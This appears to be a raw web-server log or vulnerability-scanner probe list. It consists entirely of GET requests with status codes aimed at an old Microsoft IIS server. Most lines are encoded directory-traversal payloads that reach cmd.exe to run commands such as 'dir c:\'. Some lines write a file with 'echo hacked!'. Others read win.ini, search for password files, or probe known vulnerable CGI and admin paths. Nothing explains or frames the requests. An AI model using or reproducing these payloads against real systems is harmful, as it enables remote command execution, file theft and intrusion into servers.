GET***/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c***200
GET***/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\+/OG***200
GET***/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/msadc/../../../../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\***200
GET***/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir\***200
GET***/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/msadc/..\..\..\../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/.._../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/Samples/SELECTOR/codebrws.cfm***200
GET***/msadc/Samples/selector/showcode.asp***200
GET***/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini***200
GET***/msadc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/msadc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/msadc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/msadc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/msadc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/msadc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/msadc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/msadc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/msadc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/msadc/lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/msadcs.dll***200
GET***/msadc/samples/adctest.asp***200
GET***/msadc/samples/selector/showcode.asp***200
GET***/msadc/samples/selector/showcode.asp_2***200
GET***/nikto.ida***200
GET***/nofile.pl***200
GET***/nul..cfm***200
GET***/nul..dbm***200
GET***/nul.cfm***200
GET***/nul.dbm***200
GET***/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full***200
GET***/null.ida***200
GET***/null.idc***200
GET***/null.idq***200
GET***/oc/Search/SQLQHit.asp***200
GET***/oc/Search/sqlqhit.asp***200
GET***/officescan/cgi/cgiChkMasterPwd.exe***200
GET***/officescan/cgi/jdkRqNotify.exe***200
GET***/ows-bin/perlidlc.bat?&dir***200
GET***/page.cfm***200
GET***/passwd***200
GET***/passwd.txt***200
GET***/password***200
GET***/password.dat***200
GET***/password.log***200
GET***/password.txt***200
GET***/pbserver/***200
GET***/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/pbserver/pbserver.dll***200
GET***/phorum/admin/actions/del.php***200
GET***/phorum/plugin/replace/admin.php***200
GET***/phorum/plugin/replace/plugin.php***200
GET***/prd.i/pgen/***200
GET***/private***200
GET***/process_bug.cgi***200
GET***/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini***200
GET***/publisher***200
GET***/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini***200
GET***/readme.eml***200
GET***/rightfax/fuwww.dll***200
GET***/rightfax/fuwww.dll/***200
GET***/robots.txt***200
GET***/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/rpc/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\+/OG***200
GET***/sample.asp***200
GET***/samples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/samples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/samples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/samples/lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir***200
GET***/samples/search/queryhit.htm***200
GET***/script/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/script/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/script/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/script/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/script/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/script/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/script/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/script/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/script/.._../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts    /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/scripts    /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts    /bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/scripts    /bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts    /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts***200
GET***/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/****200
GET***/scripts/***200
GET***/scripts/*.pl***200
GET***/scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/scripts/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:***200
GET***/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:***200
GET***/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:***200
GET***/scripts/..%25%35%63..%25%35%63cmd.exe***200
GET***/scripts/..%25%35%63..%25%35%63cmd.exe?%2FC+echo+\”hacked!\”>c:\\hello.bat***200
GET***/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe***200
GET***/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?%2FC+echo+\”hacked!\”>c:\\hello.bat***200
GET***/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:***200
GET***/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver***200
GET***/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%5C..%5Ccmd.exe***200
GET***/scripts/..%5C..%5Ccmd.exe?%2FC+echo+\”hacked!\”>c:\\hello.bat***200
GET***/scripts/..%5C..%5Cwinnt/system32/cmd.exe***200
GET***/scripts/..%5C..%5Cwinnt/system32/cmd.exe?%2FC+echo+\”hacked!\”>c:\\hello.bat***200
GET***/scripts/..%5C..%5Cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir***200
GET***/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\+/OG***200
GET***/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir\***200
GET***/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir\***200
GET***/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%u002f../..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%u005c../..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/scripts/../../../../../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/../../cmd.exe***200
GET***/scripts/../../cmd.exe?%2FC+echo+\”hacked!\”>c:\\hello.bat***200
GET***/scripts/../../winnt/system32/cmd.exe***200
GET***/scripts/../../winnt/system32/cmd.exe?%2FC+echo+\”hacked!\”>c:\\hello.bat***200
GET***/scripts/../../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/scripts/..\../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/.._../winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/CGImail.exe***200
GET***/scripts/Carello/Carello.dll***200
GET***/scripts/Carello/add.exe***200
GET***/scripts/Fpadmcgi.exe***200
GET***/scripts/_vti_cnf/***200
GET***/scripts/admin.exe?/c+dir%20c:\***200
GET***/scripts/admin.pl***200
GET***/scripts/bbs.pl%3F+.htr***200
GET***/scripts/c32web.exe***200
GET***/scripts/c32web.exe/ChangeAdminPassword***200
GET***/scripts/cart32.exe***200
GET***/scripts/cart32.exe/cart32clientlist***200
GET***/scripts/cfgwiz.exe***200
GET***/scripts/cgimail.exe***200
GET***/scripts/cgitest.exe***200
GET***/scripts/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c%20dir%20C:\***200
GET***/scripts/cmd.exe***200
GET***/scripts/cmd.exe?/c+dir%20c:\***200
GET***/scripts/cmd32.exe***200
GET***/scripts/cmd32.exe?/c+dir***200
GET***/scripts/contents.htm***200
GET***/scripts/convert.bas***200
GET***/scripts/counter.exe***200
GET***/scripts/cpshost.dll***200
GET***/scripts/dbman/db.cgi***200
GET***/scripts/dbman/db.cgi?db=invalid-db***200
GET***/scripts/dmailweb.exe***200
GET***/scripts/dnewsweb.exe***200
GET***/scripts/emurl/RECMAN.dll***200
GET***/scripts/environ.pl***200
GET***/scripts/eyehack.exe?/c+dir+c:\***200
GET***/scripts/fpadmcgi.exe***200
GET***/scripts/fpadmin.htm***200
GET***/scripts/fpcount.exe***200
GET***/scripts/fpremadm.exe***200
GET***/scripts/fpsrvadm.exe***200
GET***/scripts/get32.exe***200
GET***/scripts/gupcgi.exe***200
GET***/scripts/htimage.exe***200
GET***/scripts/httpodbc.dll***200
GET***/scripts/iisadmin***200
GET***/scripts/iisadmin/bdir.htr***200
GET***/scripts/iisadmin/default.htm***200
GET***/scripts/iisadmin/ism.dll***200
GET***/scripts/iisadmin/ism.dll?http/dir***200
GET***/scripts/iisadmin/samples***200
GET***/scripts/iisadmin/samples/ctgestb.htx***200
GET***/scripts/iisadmin/samples/ctgestb.idc***200
GET***/scripts/iisadmin/samples/details.htx***200
GET***/scripts/iisadmin/samples/details.idc***200
GET***/scripts/iisadmin/samples/query.htx***200
GET***/scripts/iisadmin/samples/query.idc***200
GET***/scripts/iisadmin/samples/register.htx***200
GET***/scripts/iisadmin/samples/register.idc***200
GET***/scripts/iisadmin/samples/sample.htx***200
GET***/scripts/iisadmin/samples/sample.idc***200
GET***/scripts/iisadmin/samples/sample2.htx***200
GET***/scripts/iisadmin/samples/viewbook.htx***200
GET***/scripts/iisadmin/samples/viewbook.idc***200
GET***/scripts/iisadmin/tools***200
GET***/scripts/iisadmin/tools/ct.htx***200
GET***/scripts/iisadmin/tools/ctss.idc***200
GET***/scripts/iisadmin/tools/dsnform.exe***200
GET***/scripts/iisadmin/tools/getdrvrs.exe***200
GET***/scripts/iisadmin/tools/mkilog.exe***200
GET***/scripts/iisadmin/tools/newdsn.exe***200
GET***/scripts/iisadmpwd***200
GET***/scripts/issadmin/bdir.htr***200
GET***/scripts/lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir***200
GET***/scripts/lsass.exe***200
GET***/scripts/minimal.exe***200
GET***/scripts/no-such-file.pl***200
GET***/scripts/nsiislog.dll***200
GET***/scripts/perl***200
GET***/scripts/perl.exe***200
GET***/scripts/perl?***200
GET***/scripts/pfieffer.bat***200
GET***/scripts/pfieffer.cmd***200
GET***/scripts/postinfo.asp***200
GET***/scripts/ppdscgi.exe***200
GET***/scripts/proxy/w3proxy.dll***200
GET***/scripts/proxy/w3proxy.dll***502
GET***/scripts/pu3.pl***200
GET***/scripts/redir.exe***200
GET***/scripts/repost.asp***200
GET***/scripts/repost.asp***502
GET***/scripts/rguest.exe***200
GET***/scripts/root.exe?/c%20dir***200
GET***/scripts/root.exe?/c+dir%20c:\***200
GET***/scripts/root.exe?/c+dir+c:\***200
GET***/scripts/root.exe?/c+dir+c:\+/OG***502
GET***/scripts/run.exe***200
GET***/scripts/samples***200
GET***/scripts/samples/ctguestb.idc***200
GET***/scripts/samples/details.idc***200
GET***/scripts/samples/search/author.idq***200
GET***/scripts/samples/search/filesize.idq***200
GET***/scripts/samples/search/filetime.idq***200
GET***/scripts/samples/search/qfullhit.htw***200
GET***/scripts/samples/search/qsumrhit.htw***200
GET***/scripts/samples/search/queryhit.idq***200
GET***/scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwd&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm***200
GET***/scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwl&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm***200
GET***/scripts/samples/search/simple.idq***200
GET***/scripts/samples/search/webhits.exe***200
GET***/scripts/scripts/Fpadmcgi.exe***200
GET***/scripts/sensepost.exe?/c+dir+c:\***200
GET***/scripts/shopplus.cgi***200
GET***/scripts/slxweb.dll***200
GET***/scripts/srchadm/admin.idq***200
GET***/scripts/srchadm/webhits.exe***200
GET***/scripts/submit.cgi***200
GET***/scripts/testcgi.exe***200
GET***/scripts/tools***200
GET***/scripts/tools/ctss.idc***200
